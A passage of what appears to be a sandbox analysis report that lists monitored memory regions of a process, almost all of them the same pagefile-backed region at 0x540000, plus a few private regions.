"pagefile_0x0000000000540000" filename = "" Region: id = 5636 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5637 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5638 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5639 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5640 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5641 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5642 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5643 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5644 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5645 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5646 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5647 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5648 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5649 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5650 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5651 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5653 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 5655 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 5656 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5657 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5658 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5659 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5660 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5661 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5662 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5663 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5664 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5665 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5666 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5670 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5671 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5672 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5673 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5674 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5675 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5676 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5677 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5678 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5679 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5680 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5681 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5682 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5683 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5684 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5685 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5686 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5687 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5688 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5689 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5690 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5691 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5692 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5693 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5694 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5695 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5696 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5697 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5698 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5699 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5700 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5701 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5702 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5703 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5704 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5705 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5706 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5707 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5708 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5709 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5710 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5711 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5712 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5713 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5714 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5715 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5718 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5719 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5720 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5721 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5722 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5723 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5724 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5725 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5726 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5727 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5728 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5729 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5730 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5731 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5732 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5733 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5734 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5735 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5736 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5737 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5738 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5739 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5740 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5741 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5742 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5743 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5744 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5745 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5746 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5747 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5748 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5749 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5750 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5751 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5755 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5756 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5757 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5758 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5759 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5760 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5761 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5762 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5763 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5764 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5765 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5766 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5767 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5768 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5769 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5770 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5771 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5772 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5773 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5774 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5775 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5777 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5778 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5779 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5783 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 5784 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 5785 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5786 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5787 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5788 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5789 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5790 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5791 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5793 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5794 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5795 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5796 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5797 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5798 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5799 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5800 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5801 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5802 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5803 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5804 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5805 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5806 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5807 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5808 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5809 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5810 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5811 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5812 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5813 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5818 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5819 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5820 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5821 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5822 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5823 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5824 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5825 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5826 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5827 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5828 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5829 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5830 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5831 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5832 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5833 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5834 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5835 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5836 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5837 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5838 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5839 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5841 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5842 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5843 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = 